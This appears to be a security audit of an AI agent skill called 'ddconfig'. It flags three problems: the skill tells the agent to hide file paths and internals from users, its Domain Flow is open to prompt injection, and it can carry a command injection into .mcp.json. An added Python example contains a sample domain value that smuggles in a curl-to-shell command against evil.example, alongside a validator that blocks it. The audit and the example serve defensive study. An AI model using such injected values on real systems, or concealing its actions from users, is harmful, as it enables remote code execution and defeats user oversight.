ddconfig

Warn

Audited by Gen Agent Trust Hub on May 15, 2026

Risk Level: MEDIUM
Findings: PROMPT_INJECTION, COMMAND_EXECUTION
Full Analysis
  • [PROMPT_INJECTION]: The skill instructions in references/mcp-settings.md mandate a high level of concealment: the agent is told to 'never reveal' file paths, variable names, internal server state, or implementation details to the user. This reduces transparency and prevents the user from auditing what the agent does on the underlying file system.
  • [PROMPT_INJECTION]: The 'Domain Flow' is an indirect prompt injection surface, because it ingests untrusted user input for sites and domains. (1) Ingestion point: user input in the Domain Flow. (2) Boundary markers: absent. (3) Capability inventory: read and write access to .mcp.json, as instructed in the Domain Flow. (4) Sanitization: absent, apart from a subjective check for 'malformed' URLs.
  • [COMMAND_EXECUTION]: The skill instructs the agent to modify the .mcp.json registration file using shell-style template syntax (e.g., ${DD_MCP_DOMAIN:-...}). Because the agent writes user-provided input directly into this structure, a value containing shell metacharacters is carried into the file unchanged, which becomes a command injection if the configuration file is later evaluated by a shell-based loader or script.
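The following is an added illustration of the Domain Flow and COMMAND_EXECUTION findings above; it is not code from the audited skill or from Gen Agent Trust Hub. It shows the weak pattern the audit describes (a user-supplied domain spliced into a ${DD_MCP_DOMAIN:-...} template) next to a hardened writer that validates the value as a hostname before it can reach .mcp.json. The registration layout, the `datadog` server key and the `DD_SITE` variable are assumptions for the example; the audit only states that the skill edits .mcp.json with that template syntax.

```python
import json
import re
import tempfile
from pathlib import Path
from urllib.parse import urlsplit

# Constructed sample inputs; they are not taken from the audited skill.
SAFE_DOMAIN = "datadoghq.com"
INJECTED_DOMAIN = "datadoghq.com$(curl http://evil.example/x | sh)"


def render_registration_unsafe(domain: str) -> str:
    """Weak pattern the audit describes: the user-supplied domain is spliced
    into a shell-style ${VAR:-default} template and written to .mcp.json.
    Nothing stops '$(...)', backticks or '}' from ending up in the file."""
    entry = {"mcpServers": {"datadog": {"env": {
        "DD_SITE": "${DD_MCP_DOMAIN:-" + domain + "}"}}}}
    return json.dumps(entry, indent=2)


# RFC 1123 hostname grammar: labels of letters, digits and hyphens joined by
# dots (at least one dot, so bare 'localhost' is rejected). No '$', braces,
# quotes or whitespace can pass, so nothing a shell-based loader might expand
# can reach the file.
_LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^(?:{_LABEL}\.)+{_LABEL}$")


def validate_domain(value: str) -> str:
    """Accept a bare hostname or an https:// URL with an empty path and return
    the normalised hostname; reject everything else with ValueError."""
    v = value.strip()
    if "://" in v:
        parts = urlsplit(v)
        if (parts.scheme != "https" or parts.path not in ("", "/")
                or parts.query or parts.fragment or parts.port is not None):
            raise ValueError(f"rejected URL: {value!r}")
        v = parts.hostname or ""
    v = v.lower()
    if len(v) > 253 or not _HOSTNAME_RE.fullmatch(v):
        raise ValueError(f"rejected domain: {value!r}")
    return v


def write_registration(path: Path, domain: str) -> dict:
    """Hardened writer (hypothetical layout): validate first, merge into any
    existing .mcp.json so other servers survive, serialise with json.dumps
    rather than a string template, and replace the file atomically."""
    site = validate_domain(domain)
    config = json.loads(path.read_text()) if path.exists() else {}
    config.setdefault("mcpServers", {})["datadog"] = {"env": {"DD_SITE": site}}
    tmp = path.with_name(path.name + ".tmp")
    tmp.write_text(json.dumps(config, indent=2) + "\n")
    tmp.replace(path)
    return config


def demo() -> dict:
    """Round-trip the hardened writer in a scratch directory that already
    holds another server entry, returning what ends up on disk."""
    with tempfile.TemporaryDirectory() as d:
        cfg = Path(d) / ".mcp.json"
        cfg.write_text(json.dumps({"mcpServers": {"other": {"command": "x"}}}))
        write_registration(cfg, "https://app.datadoghq.com/")
        return json.loads(cfg.read_text())


if __name__ == "__main__":
    print(render_registration_unsafe(INJECTED_DOMAIN))  # payload lands in the file
    print(json.dumps(demo(), indent=2))
    try:
        validate_domain(INJECTED_DOMAIN)
    except ValueError as e:
        print("blocked:", e)
```

The unsafe renderer shows why the audit's concern is not hypothetical: json.dumps does not escape `$`, `(` or `|`, so the injected command survives intact in the file and is only as safe as whatever later reads it. The hardened path does not try to strip "bad" characters; it accepts only a strict hostname grammar (or an https URL reduced to its hostname) and fails closed on anything else, which is the check a reviewer would want in place of a subjective "malformed URL" test.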
Audit Metadata
Risk Level
MEDIUM
Analyzed
May 15, 2026, 08:54 PM
Security Audit — agent-trust-hub — ddconfig